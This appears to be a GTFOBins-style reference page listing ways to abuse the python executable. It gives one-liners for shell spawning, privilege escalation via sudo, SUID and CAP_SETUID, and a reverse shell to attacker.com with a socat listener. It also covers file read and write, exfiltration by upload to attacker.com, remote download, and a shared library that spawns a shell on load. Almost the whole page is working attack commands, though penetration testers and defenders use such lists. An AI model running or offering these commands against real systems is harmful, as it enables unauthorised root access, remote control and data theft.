.. / python

Sponsor Fork Star

Comment

The payloads are compatible with both Python version 2 and 3.

Shell

This executable can spawn an interactive system shell.

Unprivileged
This function can be performed by any unprivileged user.
```
python -c 'import os; os.execl("/bin/sh", "sh")'
```
Sudo
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

Remarks
If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....
```
python -c 'import os; os.execl("/bin/sh", "sh")'
```
SUID
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

Remarks
This executable runs commands directly, e.g., via functions like exec, remember to omit the -p argument of every /bin/sh invocation for distributions where the default shell does not drop SUID privileges.
```
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
```
Capabilities
This function is performed bypassing the usual kernel permission checks if the executable has certain capabilities set.

The following capabilities are needed: CAP_SETUID.
```
python -c 'import os; os.setuid(0); os.execl("/bin/sh", "sh")'
```

Reverse shell

This executable can send back a reverse system shell to a listening attacker.

Unprivileged
This function can be performed by any unprivileged user.
```
python -c 'import sys,socket,os,pty;s=socket.socket()
s.connect(("attacker.com",12345))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")'
```
Sudo
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

Remarks
If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....
```
python -c 'import sys,socket,os,pty;s=socket.socket()
s.connect(("attacker.com",12345))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")'
```
SUID
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
```
python -c 'import sys,socket,os,pty;s=socket.socket()
s.connect(("attacker.com",12345))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")'
```
TTY
The spawned shell is just a dummy REPL that can only run simple terminal commands.
Listener
A TCP server with TTY support can be used on the attacker box to receive the shell.
```
socat file:/dev/tty,raw,echo=0 tcp-listen:12345
```

File write

This executable can write data to local files.

Unprivileged
This function can be performed by any unprivileged user.
```
python -c 'open("/path/to/output-file","w+").write("DATA")'
```
Sudo
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

Remarks
If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....
```
python -c 'open("/path/to/output-file","w+").write("DATA")'
```
SUID
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
```
python -c 'open("/path/to/output-file","w+").write("DATA")'
```

File read

This executable can read data from local files.

Unprivileged
This function can be performed by any unprivileged user.
```
python -c 'print(open("/path/to/input-file").read())'
```
Sudo
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

Remarks
If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....
```
python -c 'print(open("/path/to/input-file").read())'
```
SUID
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
```
python -c 'print(open("/path/to/input-file").read())'
```

Upload

This executable can upload local data.

Unprivileged

This function can be performed by any unprivileged user.

python -c 'import sys
if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u
else: import urllib as u, urllib2 as r
r.urlopen("http://attacker.com", open("/path/to/input-file", "rb").read())'

Sudo

This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

Remarks

If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

python -c 'import sys
if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u
else: import urllib as u, urllib2 as r
r.urlopen("http://attacker.com", open("/path/to/input-file", "rb").read())'

SUID

This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

python -c 'import sys
if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u
else: import urllib as u, urllib2 as r
r.urlopen("http://attacker.com", open("/path/to/input-file", "rb").read())'

Receiver

An HTTP server can be used on the attacker box to receive the data.

nc -l -p 80 | awk 'BEGIN {RS="\r\n\r\n";ORS=""} NR==2' >/path/to/output-file

Unprivileged

This function can be performed by any unprivileged user.

python -c 'import sys
if sys.version_info.major == 3: import http.server as s, socketserver as ss
else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", 12345), s.SimpleHTTPRequestHandler).serve_forever()'

Sudo

This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

Remarks

If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

python -c 'import sys
if sys.version_info.major == 3: import http.server as s, socketserver as ss
else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", 12345), s.SimpleHTTPRequestHandler).serve_forever()'

SUID

This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

python -c 'import sys
if sys.version_info.major == 3: import http.server as s, socketserver as ss
else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", 12345), s.SimpleHTTPRequestHandler).serve_forever()'

Receiver

An HTTP client can be used on the attacker box to receive the data.

curl victim.com -o /path/to/output-file

Download

This executable can download remote data.

Unprivileged

This function can be performed by any unprivileged user.

python -c 'import sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r
else: import urllib as r
r.urlretrieve("http://attacker.com/path/to/input-file", "/path/to/output-file")'

Sudo

This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

Remarks

If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

python -c 'import sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r
else: import urllib as r
r.urlretrieve("http://attacker.com/path/to/input-file", "/path/to/output-file")'

SUID

This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

python -c 'import sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r
else: import urllib as r
r.urlretrieve("http://attacker.com/path/to/input-file", "/path/to/output-file")'

Sender

An HTTP server can be used on the attacker box to send the data.

python -m http.server 80

Library load

This executable can load shared libraries that may be used to run arbitrary code in the same execution context.

Unprivileged
This function can be performed by any unprivileged user.
```
python -c 'from ctypes import cdll; cdll.LoadLibrary("/path/to/lib.so")'
```
Sudo
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

Remarks
If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....
```
python -c 'from ctypes import cdll; cdll.LoadLibrary("/path/to/lib.so")'
```
SUID
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
```
python -c 'from ctypes import cdll; cdll.LoadLibrary("/path/to/lib.so")'
```
Capabilities
This function is performed bypassing the usual kernel permission checks if the executable has certain capabilities set.

The following capabilities are needed: CAP_SETUID.
```
python -c 'from ctypes import cdll; cdll.LoadLibrary("/path/to/lib.so")'
```
Payload
As an example, the following can be used to create a minimal shared library (lib.so) that spawns a shell upon loading:
```
echo '__attribute__((constructor)) init() { execl("/bin/sh", "sh", 0); }' \
    | gcc -w -fPIC -shared -o lib.so -x c -
```
Add the usual -p argument to the shell for SUID contexts. Consider calling setuid(0); beforehand if the executable has the CAP_SETUID capability assigned.

Source | History

.. / python Sponsor Fork Star

Shell

Reverse shell

File write

File read

Upload

Download

Library load

.. / python

Sponsor Fork Star